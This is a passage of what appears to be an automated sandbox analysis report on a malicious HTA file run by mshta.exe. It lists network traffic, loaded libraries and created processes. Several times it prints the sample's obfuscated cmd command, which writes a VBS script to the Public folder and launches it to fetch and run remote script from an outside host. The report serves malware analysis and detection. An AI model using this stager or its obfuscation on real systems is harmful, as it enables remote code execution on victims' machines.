00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2777437455.000000000C36F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653583366.000000000C364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/
Source: mshta.exe, 00000000.00000003.2694992877.0000000009B21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705901193.0000000009B23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/67229b4ea74668cc93d6607967229b4ea74668cc93d660926751b0ea648b0e667ce0786
Source: mshta.exe, 00000000.00000003.2727024029.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2676098598.000000000C0EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2776512288.000000000C0ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/te
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownHTTPS traffic detected: 172.217.19.194:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.1.68:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknownHTTPS traffic detected: 16.12.2.2:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.6:49837 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.evad.winHTA@17/54@8/4
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\gtm[1].jsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E1362AF pushad ; ret 0_3_0E1362BD
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E138515 push 8B000004h; iretd 0_3_0E13851A
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
Source: C:\Windows\SysWOW64\mshta.exeCode function: 0_3_0E134CF1 pushad ; ret 0_3_0E134CF2
